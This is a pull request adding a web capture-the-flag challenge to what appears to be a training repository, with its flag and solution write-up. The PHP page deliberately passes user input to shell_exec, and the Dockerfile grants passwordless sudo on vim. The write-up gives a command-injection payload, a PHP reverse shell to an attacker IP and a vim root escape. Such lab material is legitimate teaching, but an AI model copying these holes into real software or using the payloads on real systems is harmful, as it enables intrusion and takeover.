Merge pull request #3 from lenebread/GZ---Challenge-Add---Status-Checker

Gz   challenge add   status checker

challenges/web/Status Checker/Dockerfile

@@ -0,0 +1,22 @@
+FROM debian:stable
+
+RUN apt update && apt install -y sudo cron apache2 php libapache2-mod-php curl vim
+RUN rm /var/www/html/index.html
+RUN echo "HEX{N3tw0rK_ErR_500_W1kS2kKiL}" > /root/flag.txt
+
+# Change the owner of the /var/www/ directory to www-data
+RUN chown www-data:www-data /var/www/
+
+# Add www-data to sudoers file for vim command
+RUN echo 'www-data ALL=(ALL) NOPASSWD:/usr/bin/vim' >> /etc/sudoers
+
+# Copy the PHP script to the /var/www/html directory
+COPY index.php /var/www/html/index.php
+
+# Change the Apache port to 50102
+RUN sed -i 's/80/52002/g' /etc/apache2/ports.conf /etc/apache2/sites-available/000-default.conf
+
+# Start apache2 and cron in the foreground
+CMD service apache2 start && cron -f
+
+EXPOSE 52002

challenges/web/Status Checker/README.md

@@ -0,0 +1,18 @@
+# Status Checker
+
+Check out this simple HTTP status checker I made!
+
+## Summary
+
+- Author: Goh Zavier
+- Discord Username: gzavz
+- Category: Web
+- Diffculty: Medium
+
+## Hints
+
+None
+
+## Flag
+
+``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``

challenges/web/Status Checker/index.php

@@ -0,0 +1,44 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <title>Status Checker</title>
+    <style>
+        body {
+            font-family: Arial, Helvetica, sans-serif;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+            margin: 0;
+            background-color: #f0f0f0;
+        }
+        .container {
+            text-align: center;
+            box-shadow: 0 0 10px rgba(0,0,0,0.1);
+            padding: 20px;
+            background-color: #fff;
+        }
+        .result {
+            border: 1px solid #ccc;
+            padding: 10px;
+            margin-top: 10px;
+        }
+    </style>
+</head>
+<body>
+<div class="container">
+        <h1>Website Status Checker</h1><br>
+        <form method="get">
+            <label for="url">Enter URL:</label><br><br>
+            <input type="text" id="url" name="url" size="50"><br><br>
+            <input type="submit" value="Check HTTP Status">
+        </form>
+        <?php
+        if (isset($_GET['url'])) {
+            $output = shell_exec("curl -o /dev/null -s -w '%{http_code}' " . $_GET['url']);
+            echo "<div class=\"result\">HTTP Status: $output</div>";
+        }
+        ?>
+    </div>
+</body>
+</html>

challenges/web/Status Checker/writeup.md

@@ -0,0 +1,45 @@
+We are given a site where we can check the status of websites.
+
+Entering a valid URL such as ``https://google.com`` will return us the HTTP status code as seen in the following screenshot.
+
+![wimg-1](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/2172799693442df396d9857becae25e70e1ca596/challenges/web/Status%20Checker/images/wimg-1.png)
+
+Entering a semi-colon (;) will break the command. We can try to use the payload ``; whoami``  and we are returned ``www-data`` as our user as seen in the following screenshot.
+
+![wimg-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-2.png)
+
+We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
+
+![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-3.png)
+
+Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
+
+```
+; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+
+Input the above payload into the input box as seen in the following screenshot.
+
+![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-4.png)
+
+Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
+
+![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-5.png)
+
+We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot.
+
+![wimg-6](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-6.png)
+
+Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
+
+```
+vim -c ':!/bin/sh'
+```
+
+Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot.
+
+![wimg-7](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-7.png)
+
+We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``. 
+
+The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``.